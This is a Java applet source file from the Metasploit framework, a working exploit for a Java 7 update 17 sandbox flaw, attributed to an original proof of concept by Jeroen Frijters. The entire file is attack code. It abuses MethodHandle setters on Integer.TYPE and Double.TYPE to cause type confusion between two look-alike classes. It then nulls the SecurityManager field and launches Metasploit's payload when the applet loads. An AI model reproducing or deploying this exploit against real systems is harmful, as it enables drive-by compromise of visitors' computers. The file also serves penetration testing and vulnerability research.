metasploit-framework/external/source/exploits/jre17u17/Exploit.java

//Original PoC from Jeroen Frijters @Jeroen Frijters

import java.lang.invoke.MethodHandle;
import java.lang.reflect.Field;
import static java.lang.invoke.MethodHandles.lookup;
import java.applet.Applet;
import metasploit.Payload;

class Union1 {
	int field1;
	Object field2;
}

class Union2 {
	int field1;
	SystemClass field2;
}

class SystemClass {
	Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
		f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
		f24,f25,f26,f27,f28,f29,f30;
}

public class Exploit extends Applet
{

	public Exploit()
	{
	}
        
	static void disableSecurityManager() throws Throwable {
		MethodHandle mh1, mh2;
		mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
		mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
		Field fld1 = Union1.class.getDeclaredField("field1");
		Field fld2 = Union2.class.getDeclaredField("field1");
		Class classInt = int.class;
		Class classDouble = double.class;
		mh1.invokeExact(int.class);
		mh2.invokeExact((Class)null);
		Union1 u1 = new Union1();
		u1.field2 = System.class;
		Union2 u2 = new Union2();
		fld2.set(u2, fld1.get(u1));
		mh1.invokeExact(classDouble);
		mh2.invokeExact(classInt);
		if (u2.field2.f29 == System.getSecurityManager()) {
			u2.field2.f29 = null;
		} else if (u2.field2.f30 == System.getSecurityManager()) {
			u2.field2.f30 = null;
		} else {
			//System.out.println("security manager field not found");
		}
	}    

    public void init()
    {
        try
        {
			//System.out.println(System.getSecurityManager());
			disableSecurityManager();
			//System.out.println(System.getSecurityManager());
			//Runtime.getRuntime().exec("calc.exe");            
			Payload.main(null);
        }
        catch(Exception exception)
        {
            //exception.printStackTrace();
        } catch(Throwable t) {
			//t.printStackTrace();
		}
    }

}